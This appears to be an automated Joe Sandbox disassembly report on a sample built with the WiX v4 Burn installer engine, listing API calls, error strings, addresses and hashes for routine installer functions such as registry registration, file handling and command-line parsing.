                                                                                                                                                                                                                                                                            • Failed to get msp ui options., xrefs: 009185F5
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC6C7
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC72F
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC763
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to get length of left string: %ls$Failed to get length of right string: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1973728300
                                                                                                                                                                                                                                                                            • Opcode ID: cebb9cbe8a90e25e8db59587716684e570d3370336cf61eab5214142bb04a5fb
                                                                                                                                                                                                                                                                            • Instruction ID: bbfedd7953d15c2fe1d8726a2675846e05115afa36beac35a8dcf2635c627f3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebb9cbe8a90e25e8db59587716684e570d3370336cf61eab5214142bb04a5fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451CC36D00199BBCF128EAECC45EAE77B9FB1A314F114025FD65E7260C3709E529BA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6EDE,008E6DEA,008E6DEA,00020019,008E6EDE,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817,8B000137), ref: 009455BC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get the id for the dependency "%ls"., xrefs: 00945521
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 0094548F
                                                                                                                                                                                                                                                                            • Failed to open the registry key for the dependency "%ls"., xrefs: 009454D8
                                                                                                                                                                                                                                                                            • Failed to get the version for the dependency "%ls"., xrefs: 0094559B
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 009455A7
                                                                                                                                                                                                                                                                            • Failed to get the name for the dependency "%ls"., xrefs: 0094555E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3903209405-4075874421
                                                                                                                                                                                                                                                                            • Opcode ID: f8705b5f27c2e881fa38cee091a5c4a0c3b0632299770c481e1907782ae5b94d
                                                                                                                                                                                                                                                                            • Instruction ID: 5b4d720ac09a96ce190dfff885c60c5807dafc607d1a99d1778e71a4a36b921f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8705b5f27c2e881fa38cee091a5c4a0c3b0632299770c481e1907782ae5b94d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86412633E40A65F7DF316AD48C46FAF7E2A9B40720F174269BA007B192D2754E80DAD0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000000,80004005,?,?,?,00943404,?,?,00000000,?,?,00000000), ref: 00943294
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00943404,?,?,00000000,?,?,00000000,?,?,008FC66A,?,?,00000001), ref: 009432A3
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000000,?,00000000,?,?,00943404,?,?,00000000,?,?,00000000), ref: 0094335E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00943404,?,?,00000000,?,?,00000000,?,?,008FC66A,?,?,00000001,00000001), ref: 00943368
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to create directory while moving file: '%ls' to: '%ls'$failed to move file: '%ls' to: '%ls'
                                                                                                                                                                                                                                                                            • API String ID: 3479031965-4053860161
                                                                                                                                                                                                                                                                            • Opcode ID: 23a91d0c52ea8d33043417e4fe048b61195a58a48c251991fcc59d47cd914244
                                                                                                                                                                                                                                                                            • Instruction ID: a2ddb30060efad30ef57f4c68166445862e1c7362af14a53154f874cc8c24118
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a91d0c52ea8d33043417e4fe048b61195a58a48c251991fcc59d47cd914244
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F231E037640225B7EB215E758C01FAE766DAF92BA0F51C125FD14AB290DBB0CE0097D0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6CF2,00000000,00000000,00000001,00000000,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000,8D18C483,5350F845,00020006), ref: 008F9A73
                                                                                                                                                                                                                                                                              • Part of subcall function 008F7A4E: RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7CDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to update name and publisher., xrefs: 008F9ACB
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F9A10, 008F9A5D
                                                                                                                                                                                                                                                                            • Failed to update estimated size., xrefs: 008F9AFA
                                                                                                                                                                                                                                                                            • Failed to update resume mode., xrefs: 008F9A4B
                                                                                                                                                                                                                                                                            • Failed to open registration key., xrefs: 008F9A9B
                                                                                                                                                                                                                                                                            • Failed to delete registration key: %ls, xrefs: 008F99FE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to delete registration key: %ls$Failed to open registration key.$Failed to update estimated size.$Failed to update name and publisher.$Failed to update resume mode.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-4174111784
                                                                                                                                                                                                                                                                            • Opcode ID: 35bce05b1516294bf5b98ac436c763ef8b1bd0b22dd273f40ba855dc65501c78
                                                                                                                                                                                                                                                                            • Instruction ID: d7b850c354a90b51c0c8b8d574a920b79109132cc97eb75a3bb5dfcf9c41daea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35bce05b1516294bf5b98ac436c763ef8b1bd0b22dd273f40ba855dc65501c78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5231E332644629BBDF22AE758C06FBF7E25FB05B54F110100FB04F5090D7B29A60EB92
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to create the string dictionary., xrefs: 00900664
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900676, 009006C3, 00900760
                                                                                                                                                                                                                                                                            • ALL, xrefs: 00900702
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of unique dependencies., xrefs: 009006B1
                                                                                                                                                                                                                                                                            • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0090074E
                                                                                                                                                                                                                                                                            • Failed to add "%ls" to the string dictionary., xrefs: 0090073A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-461799926
                                                                                                                                                                                                                                                                            • Opcode ID: fab6e920a26003b321d858fa73cc1fc5aecd59da80b5916e97eea3dfc9c0ed5d
                                                                                                                                                                                                                                                                            • Instruction ID: ddee53d30ef70db5dad4d3b98a7e894dfcc40259b9f4e70e4c5484288735f901
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fab6e920a26003b321d858fa73cc1fc5aecd59da80b5916e97eea3dfc9c0ed5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A31FDB1A85328BEDB21AA958C47F9F3968DBC1F65F100210FE01FA1C2E1F46D40D7A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,?,?,?,00000000,?,?,?,?,00910576,?,00000000,8000FFFF), ref: 00910415
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read QuietUninstallString., xrefs: 009103ED
                                                                                                                                                                                                                                                                            • Failed to build full key path., xrefs: 0091034A
                                                                                                                                                                                                                                                                            • Failed to open registry key: %ls., xrefs: 0091039B
                                                                                                                                                                                                                                                                            • QuietUninstallString, xrefs: 009103C6
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0091033A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp, xrefs: 009103AD, 009103FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to build full key path.$Failed to open registry key: %ls.$Failed to read QuietUninstallString.$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1706903631
                                                                                                                                                                                                                                                                            • Opcode ID: 855dc126fc5c155280804cab59829234c829674cd82fcf6f3f6482be37101951
                                                                                                                                                                                                                                                                            • Instruction ID: b6b4983179249ad435f073ebd78125aae8d27ffe5f9362e896aae89e02ba5d65
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855dc126fc5c155280804cab59829234c829674cd82fcf6f3f6482be37101951
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0314672B4031AFBDB219B948C42FDEBBA8EF44700F114129F955B6291E2F29DD09791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,?,?), ref: 009474BC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2641142750
                                                                                                                                                                                                                                                                            • Opcode ID: c18cd4f27affc30ccf30fc3e2523639eaeed7b4db0e042302a97e61e29509552
                                                                                                                                                                                                                                                                            • Instruction ID: 653ca7981cfbfa6b3b46c081fe01b51b3d06ed2c6d10b82648dba9eb0fb795f5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c18cd4f27affc30ccf30fc3e2523639eaeed7b4db0e042302a97e61e29509552
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431D772E4821CBBCB219DD98C49FBFFF6EEB41754F018169BA08B6191D3758E10D6A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,008E1CD0,?,00000105,00000000,?,00000000,?,?), ref: 008E5832
                                                                                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,008E1CD0,?,00000105,00000000,?,00000000,?,?,?,?,008E29D8,?,?,00000000), ref: 008E5839
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • _memcpy_s.LIBCMT ref: 008E58BD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate_memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3866612605-1266056832
                                                                                                                                                                                                                                                                            • Opcode ID: 0206951f45b8437e727c9c5f8f57b4c4dca80dc6a1be604c0a3041f3cf807785
                                                                                                                                                                                                                                                                            • Instruction ID: 1d04016507c6d50c757605dcbe7036cc51b6c3895df0dde49f7d06c24eae4cd1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0206951f45b8437e727c9c5f8f57b4c4dca80dc6a1be604c0a3041f3cf807785
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02312B31540B99FBDB11AE6ACC45FAF3A69FB82719F100130F904EB151D671CD11A791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,0093D811,008E6CF2,009031C1,009031C1,00000001,?,008F79A8,009031C1,DisplayName,00000000,008E6CF2,009031C1,00000000,008E6CF2), ref: 0093C42D
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,0093D811,008E6CF2,009031C1,009031C1,00000001,?,008F79A8,009031C1,DisplayName,00000000,008E6CF2,009031C1,00000000,008E6CF2), ref: 0093C47F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Delete
                                                                                                                                                                                                                                                                            • String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1738766685-322587201
                                                                                                                                                                                                                                                                            • Opcode ID: 96333ee618e1aba4847dd7ed2d5d75d15b9a4e4fc66caa1525a7a9f0663ef921
                                                                                                                                                                                                                                                                            • Instruction ID: 2029a7ce8fe5fa92b87ba1fcbc27ed36ef34fe929da79191618096655681567a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96333ee618e1aba4847dd7ed2d5d75d15b9a4e4fc66caa1525a7a9f0663ef921
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F2106BB214A25B7EB115B158C1DEBF2A6DEBC6760F158024FE18B72A0E630CC119B70
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,008E6570,00000000,008E6570,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,008E7B19,00000000,?), ref: 009399E1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E7B19,00000000,?,?,00000003,00000000,008E6570,00000000,?,?,?,?,?), ref: 009399EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                                                                                                                            • String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
                                                                                                                                                                                                                                                                            • API String ID: 3459693003-1494111247
                                                                                                                                                                                                                                                                            • Opcode ID: 0556db46d5c0845fb979d8db6ead42ba6bdf7c7fbaa279756cb8da5cea79f8c9
                                                                                                                                                                                                                                                                            • Instruction ID: 281cd50592ece6a1a349e90061cb95211af342a33d3f543586b6f74c29ecc51e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0556db46d5c0845fb979d8db6ead42ba6bdf7c7fbaa279756cb8da5cea79f8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1721C876A40224BBDB219B598C0AF9F7EACEF51B50F014155FE08FB281E6B09E00DA91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(0091E626,00000080,00000000,0091E626,000000FF,00000000,00000000,?,?,0091E626), ref: 009431E0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0091E626), ref: 009431EA
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0091E626,00000000,0091E626,000000FF,00000000,00000000,?,?,0091E626), ref: 00943223
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0091E626), ref: 0094322D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                            • String ID: Failed to delete file: %ls$Failed to remove attributes from file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3967264933-3778428042
                                                                                                                                                                                                                                                                            • Opcode ID: 507c0cbefae7a366628eef137a26200f3214b66bf48a4931ea1de9af8f188ba4
                                                                                                                                                                                                                                                                            • Instruction ID: 2d430bd436342e95f8962382e09b26fe77c3f765274e789f43b526474d2f1b66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 507c0cbefae7a366628eef137a26200f3214b66bf48a4931ea1de9af8f188ba4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0011D073A4572532D231927A9C4AF6FB95CAF42BA5F01C200FD24F61C1E6A0CE0196E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0090E336
                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0090E348
                                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 0090E35B
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0090DE6A,?,?), ref: 0090E36A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                            • String ID: Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 609741386-1783119398
                                                                                                                                                                                                                                                                            • Opcode ID: 70fd524e4c875c48deda7bbfc00fedbbd2ecb447c88a6b0a44c91e6c076fa931
                                                                                                                                                                                                                                                                            • Instruction ID: e4256684c3a241e21d789d8c7b82423ed66a397daca878b83ce566cef247f668
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70fd524e4c875c48deda7bbfc00fedbbd2ecb447c88a6b0a44c91e6c076fa931
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C821CFB280021ABFCB10DF698C48DAA7BACFB09720B404616F965E71D0D374EA50CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 00941B7E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00941D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00941B8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
